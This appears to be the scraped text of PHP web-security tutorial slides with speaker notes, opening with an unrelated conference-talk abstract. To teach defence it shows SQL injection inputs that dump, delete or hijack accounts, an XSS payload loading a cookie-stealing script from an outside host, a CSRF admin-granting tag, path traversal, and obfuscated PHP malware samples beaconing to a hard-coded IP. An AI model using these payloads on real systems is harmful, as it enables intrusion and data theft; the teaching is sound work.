The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
12. Who am I ?
Wim Godden (@wimgtr)
Founder of Cu.be Solutions (http://cu.be)
Open Source developer since 1997
Developer of PHPCompatibility, OpenX, Nginx SLIC, ...
Speaker at PHP and Open Source conferences
13. Who are you ?
Developers ?
System engineers ?
Network engineers ?
Ever had a hack ?
Through the code ?
Through the server ?
14. This tutorial
Based on 2-day training
Big group → no Vagrant/VirtualBox required
Code samples will be provided after tutorial
Lots of links at the end → slides on Joind.in
15. My app is secure... I think
Basic stuff = known...
… or is it ?
Code is not enough
Code
Webserver
Database server
Operating system
Network
16. Disclaimer
Do not use these techniques to hack
Use the knowledge to prevent others from hacking you
17. Reasons for hackers to hack
Steal and sell your data
Use your infrastructure as a jumpstation to hack other servers
Send out lots of spam
Use your server in a botnet for DDOS attacks
Bring down your systems
…
21. SQL Injection (OWASP #1)
<?
require("header.php");
$hostname="localhost";
$sqlusername="someuser";
$sqlpassword="somepass";
$dbName="somedb";
MYSQL_CONNECT($hostname,$sqlusername,$sqlpassword) OR DIE("Unable to connect to database.");
@mysql_select_db("$dbName") or die("Unable to select database.");
$fp=fopen("content/whatever.php","r");
while (!feof($fp))
$content.=fgets($fp,2);
$res=MYSQL_DB_QUERY("somedb","select * from whatever where id=" . $_GET['id']);
for ($cnt=0;$cnt<MYSQL_NUMROWS($res);$cnt++)
{
$lst.="<LI>".MYSQL_RESULT($res,$cnt,"text")."</LI>n";
}
$content=str_replace("<@textstring@>",$lst,$content);
print $content;
require("footer.php");
?>
22. SQL Injection (OWASP #1)
Over 15 years
Still #1 problem
Easy to exploit
Easy to automate (scan + exploit)
Often misunderstood
23. Standard SQL injection example
<?php
$query = "select * from user where email='" . $_POST['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'All is good';
} else {
echo 'Nobody home';
}
' OR '1'='1
select * from user where email='' OR '1'='1'
E-mail :
24. Standard SQL injection example
<?php
$query = "select * from user where email='" . $_POST['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'All is good';
} else {
echo 'Nobody home';
}
' OR '1'='1
select * from user where email='' OR '1'='1'
E-mail :
25. Standard SQL injection example
<?php
$query = "select * from user where email='" . $_POST['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'All is good';
} else {
echo 'Nobody home';
}
' OR '1'='1
select * from user where '1'='1'
E-mail :
26. Standard SQL injection example
<?php
$query = "select * from user where email='" . $_POST['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'All is good';
} else {
echo 'Nobody home';
}
' OR '1'='1
select * from user;
E-mail :
28. SQL injection – sample – lostpassword.php
<?php
$query = "select * from user where email='" . $_POST['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'Error !';
} else {
if (mysql_numrows($result) == 0) {
echo 'E-mail address not found';
} else {
$newpass = updatepassword(mysql_result($result, 0, 'email'));
mail($_POST['email'], 'New password', 'New password: ' . $newpass);
echo 'New password sent to ' . mysql_result($result, 0, 'email');
}
}
29. SQL injection – sample – lostpassword
lostpassword.php?email=whatever@me.com%27+OR+%271%27%3D%271
email=whatever@me.com' OR '1'='1
select * from user where email='whatever@me.com' OR '1'='1'
30. Worst case : data deletion
email=whatever@me.com' OR '1'='1'; delete from user where '1'='1
31. Knowing the table structure
email=whatever@me.com' AND email is NULL; --'
select * from user where email='whatever@me.com' AND email is NULL; --';
<?php
$query = "select * from user where email='" . $_GET['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'Error !';
} else {
if (mysql_numrows($result) == 0) {
echo 'Not found';
} else {
$newpass = updatepassword(mysql_result($result, 0, 'email'));
mail($_GET['email'], 'New password', 'Your new password is ' . $newpass);
echo 'Your new password was sent to ' . mysql_result($result, 0, 'email');
}
}
33. Update, retrieve password, update again
email=whatever@me.com'; UPDATE user set
email='myhackeraddress@gmail.com' where email='some-user-
we@found.com'; --';
Retrieve password for myhackeraddress@gmail.com
email=whatever@me.com'; UPDATE user set email='some-user-
we@found.com' where email='myhackeraddress@gmail.com'; --';
34. Hackers just want your data
email=whatever@me.com' OR 1=1 limit 2, 1; --';
email=whatever@me.com' OR 1=1 limit 3, 1; --';
email=whatever@me.com' OR 1=1 limit 4, 1; --';
...
35. They want ALL data (not just email addresses)
Find a long field (address field is a good candidate)
email=whatever@me.com'; UPDATE user set address=concat(address, '|||',
password), email='myhackeraddress@gmail.com' where email='some-user-
we@found.com'; --';
Retrieve password for myhackeraddress@gmail.com and start scraping
email=whatever@me.com'; UPDATE user set
password=substring_index(address, '||', -1),
address=substring_index(address, '||', 1), email='some-user-we@found.com'
where email='myhackeraddress@gmail.com'; --';
36. SQL Injection – much more...
Much more than logging in as a user
SQL injection possible → wide range of dangers
37. Fixing SQL injection : attempt #1
Addslashes() ?
$query = mysql_query('select * from user where id=' . addslashes($_GET['id']));
5 and sleep(10)
select * from user where id=5 and sleep(10)
What if we hit that code 100 times simultaneously ?
MySQL max_connections reached → Server unavailable
41. Other injections
LDAP injection
Command injection (system, exec, ...)
Eval (waaaaaaaaaah !)
…
User input → PHP → External system
If you provide the data, it's your responsibility !
If you consume the data, it's your responsibility !
42. Demo
<?php
mysql_connect('localhost', 'sqlinjection', 'password') or die('Not working');
mysql_select_db('sqlinjection');
$result = mysql_query("select * from user where email='" . $_GET['email'] . "'");
if (mysql_numrows($result) > 0) {
echo mysql_result($result, 0, 'name');
} else {
echo 'Error';
}
47. Ways to avoid session fixation/hijacking
session.use_trans_sid = 0
session.use_only_cookies = true
session.cookie_httponly = true
Change session on login using session_regenerate_id(true)
Do not share sessions between sites/subdomains
Do not accept sessions not generated by your code
Foreign session → remove the session cookie from the user
Regenerate session regularly using session_regenerate_id(true)
Use HTTPS
session.cookie_secure = true
All of the above help against session fixation AND session
hijacking !
48. XSS – Cross Site Scripting
<?php
addMessage($_GET['id'], $_GET['message']);
echo 'Thank you for submitting your message : ' . $_GET['message'];
URL : /submitMessage
http://www.our-app.com/submitMessage?id=5&message=<script>alert('Fun eh ?')</script>
49. XSS – more advanced
http://www.our-app.com/submitMessage?id=5&message=Thanks, we will be in
touch soon.<script type="text/javascript" src="http://someplace.io/i-will-get-your-
cookie.js"></script>
51. XSS : Non-persisted vs persistent
Previous examples were non-persistent : issue occurs once
Post code to exploitable bulletin board
→ Persistent
→ Can infect every user
→ If you stored it without filtering, you're responsible for escaping on
output !
52. XSS : how to avoid
Filter input, escape output
<?php
echo 'I just submitted this message : ' .
htmlentities($_GET['message'], ENT_QUOTES, 'UTF-8', false);
53. CSRF : Cross Site Request Forgery
www.our-app.com
1
Submit article
for review
2
Retrieve articlefor review
3
Evil html or jsmakes call
4
Devil uses extra
privileges
Here's the article you were asking for.
<img src=”http://www.our-app.com/userSave.php?username=Devil&admin=1” />
54. CSRF : ways to avoid
Escape the output (where did we hear that before ?)
Add a field to forms with a random hash/token for verification
upon submit
Check the referer header
<form method="post" action="userSave.php">
<input name="id" type="hidden" value="5" />
<input name="token" type="hidden" value="a4gjogaihfs8ah4gisadhfgifdgfg" />
rest of the form
</form>
55. General rules – input validation
Assume all data you receive as input
contains a hack attempt !
Filter on disallowed characters
Check validity of
Dates
Email addresses
URLs
etc.
Input validation is not browser-side code, it's server-side code
(you can ofcourse use browser-side code to make it look good)
56. General rules – validation or filtering ?
Validation :
Verify if the values fit a defined format
Examples :
expecting int, but received 7.8 → “error, 7.8 is not a valid integer”
expecting international phone number, but received “+32 3 844 71 89”
Filtering / sanitizing :
Enforce the defined format by converting to it
Examples :
expecting int, but received 7.8 → 8
expecting int, but received 'one' → 0
Both have (dis)advantages
57. General rules – escaping output
Doing input validation → why do you need output escaping ?
What if the data originates from
a webservice
an XML feed
…
Always escape output !
58. Clickjacking
Do you want to
support
our cause ?
NoSure
Do you want to
delete all your
Facebook
friends ?
Yes No
FB button
60. Bad authentication / authorization layer
index.php
(checks cookie)
login.php
(sets cookie)
redirect
to login
main.php
redirect
to main
61. Bad authentication / authorization layer
index.php
(checks cookie)
login.php
(sets cookie)
redirect
to login
main.php
(doesn't check
cookie !)
redirect
to main
62. Bad authentication / authorization layer
Only hiding URLs on view, not restricting on action
/somewhere is visible on screen
/somewhere/admin is not visible, but is accessible
Allowing direct access to other user's data
/user/profile/id/311 is the user's profile
/user/profile/id/312 is also accessible and updateable
Allowing direct access to file downloads with guessable urls
/download/file/83291.pdf
Creating cookies :
loggedin=1
userid=312
admin=1
63. Protecting your web stack
PHP
Webserver
Database server
Mail server
Other servers
Firewalls
...
64. Protecting your web stack - PHP
Update to the latest version (5.4 = EOL, 5.5 will be EOL this
year)
Safe_mode = dead → use PHP-FPM or VMs
Register_globals = dead :-)
Suhosin patch → mostly for web hosting companies
Disable 'dangerous' PHP functions you don't need in php.ini
system
exec
passthru
'Eval' is not a function, so can not be disabled
65. Protecting your web stack – PHP code
If you allow uploads, restrict extensions. No .php, .phtml !
Don't show errors...
66. Protecting your web stack – PHP code
If you allow uploads, restrict extensions. No .php, .phtml !
Don't show errors...
...and don't show exceptions, but...
…log them ! And watch your logs ;-)
If you use filenames as parameters
download.php?filename=test.pdf
Make sure you don't allow ../../../../etc/passwd
Use basename() and pathinfo() to restrict
File extensions :
Use .php
Don't use .inc, .conf, .include, ...
67. Detecting hack attempts from PHP
2 options :
Build your own
Use an existing system
CAPTCHA
IDS
68. Building a simple system
Add an input field that's hidden from view (bots will fill it out)
Implement a captcha
Limit number of attempts on captcha
Limit number of posts to certain URL
69. Limiting number of posts to a URL
function isUserBlocked($userId) {
$submissions = $memcache->get('submissions_' . $userId);
if ($submissions->getResultCode() == Memcached::RES_NOTSTORED) {
$submissions = array();
}
$now = new DateTimeImmutable();
if (count($submissions) == 10) {
if (new DateTime($submissions[9]) > $now->modify('-1 hour')) {
return false;
}
unset($submissions[9]);
}
array_unshift($submissions, $now->format(DateTime::ATOM));
$memcache->set('submissions_' . $userId, $submissions);
return true;
}
70. Using an existing system
PHPIDS :
The standard IDS for PHP
More complete
Exposé :
By @enygma (Chris Cornutt)
Faster
Use the same ruleset
Provides impact value =
level of trust in data
$data = array(
'POST' => array(
'test' => 'foo',
'bar' => array(
'baz' => 'quux',
'testing' => '<script>test</script>'
)
)
);
$filters = new ExposeFilterCollection();
$filters->load();
$logger = new ExposeLogMongo();
$manager = new ExposeManager($filters, $logger);
$manager->run($data);
// should return 8
echo 'impact: '.$manager->getImpact()."n";
71. Protecting your web stack – Passwords
Don't md5() → sha512, blowfish, …
Set a good password policy
Min 8 chars, min 1 number, min 1 uppercase char, …
NO maximum length
Try to avoid password hints
→ Email is better for recovery
Don't create your own password hashing algorithm !
Use password_hash
5.5+ : built-in
< 5.5 : ircmaxell/password-compat
75. Protecting your web stack – Webserver
Block direct access to upload directories
Allow only access to port 80 and 443 (!)
Disable phpMyAdmin (VPN only if required)
On Apache don't :
AllowOverride All
Options Indexes
Block access to .svn and .git
77. Protecting your web stack – Webserver
Don't run web server as root
Don't let web server user access anything outside web root
Detect and ban flood/scan attempts in Nginx :
http {
limit_conn_zone $binary_remote_addr zone=conn_limit_per_ip:10m;
limit_req_zone $binary_remote_addr zone=req_limit_per_ip:10m rate=5r/s;
server {
limit_conn conn_limit_per_ip 10;
limit_req zone=req_limit_per_ip burst=10 nodelay;
}
}
79. Protecting your web stack – Database server
No access from the web required
Give it a private IP
Other websites on network ?
→ send traffic over SSL
1 user per DB
1 DB per user
1 DB per application
80. Protecting your web stack – Mail server
Setup SSL for POP3, IMAP, SMTP
Setup DomainKeys
Setup SPF (Sender Policy Framework)
81. Protecting your web stack – DNS server
Possible weak point in architecture
Controls web, MX (mail) records, anti-spam, etc.
DNS hijacking
DNS spoofing
82. Protecting your web stack
Use public/private key pairs for SSH, not passwords
Don't login as root
→ Use sudo for commands that really need it
Allow SSH access only from VPN
Running
Memcached ?
Gearman ?
… ?
→ Block external access
83. Lack of updates
Not updating system packages
Not updating frameworks and libraries
Not just main components
Doctrine
Bootstrap
TinyMCE
etc.
Not updating webserver software
Not updating database server software
Recently :
Heartbleed (OpenSSL)
Shellshock (Bash)
Ghost (Glibc)
84. Protecting your web stack - firewalls
Separate or on-server
Default policy = deny all
Don't forget IPv6 !!!
Perform regular scans from external location
Use blacklists to keep certain IP ranges out
85. First action of a hacker
Make sure they don't lose the access they gained
Create new user → easy to detect
Install a custom backdoor
→ easy to detect with good IDS
Install a backdoor based on installed software
→ Example : start SSHD with different config on different port (remember firewall ?)
→ Harder to detect
→ Kill it... what happens ?
→ Probably restarts via cronjob
86. Using an Intrusion Detection System
Host-based Intrusion Detection System (HIDS)
Network-based Intrusion Detection System (NIDS)
87. Host-based Intrusion Detection System
Scans the file system for changes
New/deleted files
Modified files (based on checksum)
File permission changes
Old systems are standalone :
AIDE, Tripwire, AFICK
Easy to update by hacker, not recommended (unless combined with
backup system)
Intrusion detection by backup
Best Open Source tool = OSSEC
Client-server-based architecture → real-time notification that hacker
can't stop
Centralized updates
92. Decentralized alternative : Samhain
Can be used centralized or standalone
Log to syslog, send email, write to DB
Processing on the client
Improves processing speed
Requires CPU power on client
93. Network-based Intrusion Detection Systems
Snort
Open Source
Supported by Cisco (rules are not free)
Analyzes traffic, blocks malicious traffic
Huge user base, tons of addons
99. One IDS distro to rule them all
Security Onion
Based on Ubuntu
Contains all the IDS tools...
...and much more
100. You've been hacked ! Now what ? (1/3)
Take your application offline
→ Put up a maintenance page (on a different server)
Take the server off the public Internet
Change your SSH keys
Make a full backup
Check for cronjobs
Check access/error/... logs
(And give them to legal department)
Were any commits made from the server ?
→ Your server shouldn't be able to !
101. What a PHP hack might look like
eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0
xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFf
OF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKSl7aW
5jbHVkZV9vbmNlKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRl
cy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbC
cpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRl
Y29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW
9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRG
ODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5RTQxKSsxO31pZigkUjZCNk
U5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygk
UjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKS
sxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVF
NDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRk...'));
103. What a PHP hack might look like
$GLOBALS['_226432454_']=Array();
function _1618533527($i)
{
return '91.196.216.64';
}
$ip=_1618533527(0);
$GLOBALS['_1203443956_'] = Array('urlencode');
function _1847265367($i)
{
$a=Array('http://','/btt.php?
ip=','REMOTE_ADDR','&host=','HTTP_HOST','&ua=','HTTP_USER_AGENT','&ref=','HTTP_REFERER');
return $a[$i];
}
$url = _1847265367(0) .$ip ._1847265367(1) .$_SERVER[_1847265367(2)] ._1847265367(3) .
$_SERVER[_1847265367(4)] ._1847265367(5) .$GLOBALS['_1203443956_'][0]($_SERVER[_1847265367(6)])
._1847265367(7) .$_SERVER[_1847265367(8)];
$GLOBALS['_399629645_']=Array('function_exists', 'curl_init', 'curl_setopt', 'curl_setopt',
'curl_setopt', 'curl_exec', 'curl_close', 'file_get_contents');
function _393632915($i)
{
return 'curl_version';
}
104. What a PHP hack might look like - location
Changes to .htaccess
Files in upload directory
PHP code in files with different extension
New modules/plugins for Drupal/Wordpress
105. You've been hacked ! Now what ? (2/3)
Search system
preg_replace
base64_decode
eval
system
exec
passthru
Search system and database
script
iframe
106. You've been hacked ! Now what ? (3/3)
Find out how the hack happened ;-)
Write an apology to your customers
Finally :
Reinstall the OS (from scratch !)
Update all packages to the latest version
Don't reinstall from backup !
Install source code
Restore DB from previous backup (use binary log file)
Change user passwords
Relaunch
107. Takeaways
Think like a hacker
Can I steal data ? Can I DOS the site ?
Which techniques could I use to do it ?
Try it without looking at the code
Try it while looking at the code
Use SSL/HTTPS everywhere !
Block all traffic, then allow only what's needed
Sanitize/filter your input
Escape your output
Block flooders/scanners
Use an IDS
Never trust a hacked system
112. The software discussed (and more)
Protecting your mail server
SPF and DomainKeys :
http://www.pardot.com/faqs/administration/adding-spf-domainkeys-dns/
DNS
Hijacking : http://www.gohacking.com/dns-hijacking/
Spoofing :
http://www.windowsecurity.com/articles-tutorials/authentication_and_encryptio
IPv6 – don't forget to firewall it the same way :
https://www.sixxs.net/wiki/IPv6_Firewalling
Automatic scanning tools :
Nessus : http://www.tenable.com/products/nessus-vulnerability-scanner
Wapiti : http://wapiti.sourceforge.net/
Nexpose : http://www.rapid7.com/products/nexpose/
113. The software discussed (and more)
Slow HTTP DOS attacks :
https://www.acunetix.com/blog/articles/slow-http-dos-attacks-mitigate
IDS
PHP
PHPIDS : https://github.com/PHPIDS/PHPIDS
Exposé : https://github.com/enygma/expose
Host-based
OSSEC : www.ossec.net
Samhain : http://www.la-samhna.de/samhain/
AIDE : http://aide.sourceforge.net/
Network-based
Snort : https://www.snort.org/
Sirucata : http://suricata-ids.org/
All in one : Security Onion : http://blog.securityonion.net/
114. The software discussed (and more)
Penetration testing live CD :
Backtrack Linux : http://www.backtrack-linux.org/
Kali Linux : https://www.kali.org/
This morning we&apos;re going to talk about security.
This tutorial is based on a 2day training that we offer.
Training → exercises with Vagrant/Virtualbox
Only 3h → too short to try everything
→ usually takes 30min before everyone&apos;s ready
We have a lot of ground to cover, because...
Tutorial is titled...
devs know basic security no-nos
often unaware of less-common issues
More importantly : creating secure app = more than creating secure code.
Web app = chain of software and hardware
Every part of chain = equally important.
Neglecting single component → app and data at risk
So next 3h → code and how to secure it
Also security of web stack.
Detect hack attempt, again both in code and stack
Techniques to make it harder to go unnoticed
Before we begin :
Little disclaimer
Looking at techniques hackers use
Not promoting techniques
Explaining to help you understand there&apos;s lot more than meets the eye.
Use knowledge to improve security, not exploit bad code
….
That&apos;s the reason to spend a little time explaining
why there&apos;s so much more to SQL injection than what most people think or talk about in talks
….
That&apos;s the reason to spend a little time explaining
why there&apos;s so much more to SQL injection than what most people think or talk about in talks
….
That&apos;s the reason to spend a little time explaining
why there&apos;s so much more to SQL injection than what most people think or talk about in talks
Lost password function
EXPLAIN CODE
How would you exploit this code ?
1=1
Always true
Rest ignored
All rows fetched
→ first one used in code
→ pw changed
→ mail sent
→ email address shown
→ exposing application data
Bad, but can be worse. Probably thinking about this :
Pretty horrific ofcourse
But : most hackers won&apos;t do this
Reason : they want your data, not destroy it
Exploit SQL injection : know table structure
Looking at code → query will fail if field name is wrong
If field name is correct → return not found
Find other fields in same way
We can then try to insert
Might fail because of missing foreign keys or mandatory fields we don&apos;t know
However, we can always update email address of user we know
→ set to our email
Then retrieve password
Then reset email
But now we have login access !
As already mentioned : hackers want your data
Easy way to retrieve it.
Increment the limit start
Retrieve each row of the table
As already mentioned : hackers want your data
Easy way to retrieve it.
Increment the limit start
Retrieve each row of the table
So how do we fix SQL injection ?
Who has ever used addslashes to... ?
How could you exploit this code ? No quotes !
We can&apos;t retrieve data, but we can cause each query to sleep 10 sec.
So addslashes is not a good solution
The second option is the real_escape_string functions.
Although they&apos;re not bad → not really ideal anymore
Best way : prepared statements
They&apos;re the most convenient and flexible way to protect against all the things we just saw.
ORMs will help
→ they use prepared statements
→ You can still execute raw SQL
→ still vulnerable to SQL
→ be careful, even with ORM
Plenty of other injections possible
Rule is : don&apos;t accept input from user and send it unfiltered to external system
Let&apos;s say SOAP webservice someone wrote years ago.
Unfiltered data → SOAP → might have SQL injection issue.
Not your problem ? SOAP developer gone, source code gone ? You consume service, you need to provide good data.
Not as well know, but very dangerous and sneaky
How it works...
EXPLAIN SLIDE
Ofcourse this implies passing session id in query string
→ Not recommended
→ Enable session.user_only_cookies
Another common way
Not passing session id on query string
Works on limited sites
Let&apos;s say we can register subdomain and run PHP code
EXPLAIN SLIDE
Session fixation is serious problem
Luckily few things that can be done
All of tips also help in avoiding hijacking
→ when http traffic is intercepted
→ cookie gets stolen
XSS problem is mostly poor output escaping
This is most simple version.
However, can get a lot worse.
Non-persistent : targeted to one user at a time
Persistent : can infect every usre